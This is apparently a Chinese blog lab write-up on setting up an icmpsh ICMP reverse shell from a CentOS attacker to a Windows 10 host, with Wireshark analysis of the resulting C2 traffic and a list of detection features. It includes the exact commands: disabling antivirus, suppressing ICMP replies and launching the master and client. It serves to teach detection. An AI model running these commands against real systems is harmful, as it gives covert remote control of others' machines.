目录

一、环境

Win10:10.95.16.112
CentOS7:10.95.16.103

二、工具

icmpsh
python2

三、操作

win10关闭防火墙,病毒检测,不然icmpsh.exe会被自动删除
centOS7安装python2对应的库文件用于支持icmpsh工具

pip2 install impacket

在这里插入图片描述

1、CentOS7
sysctl -w net.ipv4.icmp_echo_ignore_all=1 【关闭本机的icmp响应】

python2 icmpsh_m.py 10.95.16.103 10.95.16.112

在这里插入图片描述

2、Win10
icmpsh.exe -t 10.95.16.103

在这里插入图片描述

3、反弹成功

在这里插入图片描述
【这里执行了whoamiipconfig两个命令便于观察下面流量信息】

四、C2流量分析
1、正常的icmp流量

数据包长度不大
数据包长度不大,有交互
数据包内容
在这里插入图片描述
在这里插入图片描述

2、恶意的icmp流量

数据包长度明显过长
在这里插入图片描述
且数据包没有data字段

在这里插入图片描述
在这里插入图片描述

3、C2数据

第一个包攻击机下达命令
在这里插入图片描述
第二个包回显命令执行结果
在这里插入图片描述
如果一来一回reply-request没有把命令回显结束,则会分包回显命令执行结果
执行了ipconfig命令
在这里插入图片描述
回显,一个包没有回显结束
在这里插入图片描述
第三个包空(reply包)
在这里插入图片描述
第四个包继续回显
在这里插入图片描述

总结

在当前的实验环境下,icmp流量抓取的相对容易,而且流量是明文传输,特征十分的明显。总结以下几点:
1、数据包长度过长
2、数包没有data字段
3、reply包携带明文的命令语句(同时没有info内容)
4、request包明文回显执行结果(info内容为 no response found
5、一个数据包回显不完C2结果会以多个包的形式回显(期间reply数据包没有data字段且info为空)

by 久违
2021.9.29

# 网络安全 # wireshark # 网络协议 # 系统安全 # linux
Logo
天启AI社区

GitCode 天启AI是一款由 GitCode 团队打造的智能助手,基于先进的LLM(大语言模型)与多智能体 Agent 技术构建,致力于为用户提供高效、智能、多模态的创作与开发支持。它不仅支持自然语言对话,还具备处理文件、生成 PPT、撰写分析报告、开发 Web 应用等多项能力,真正做到“一句话,让 Al帮你完成复杂任务”。

更多推荐

cover

【感知机】感知机(perceptron)学习算法例题及详解

avatar 天启AI社区
cover

AI云原生:数智化时代AI Agent加速落地的技术基石与实践指南(THS)

avatar 天启AI社区
cover

【AI论文】设计实验室:通过迭代检测与修正来设计幻灯片

avatar 天启AI社区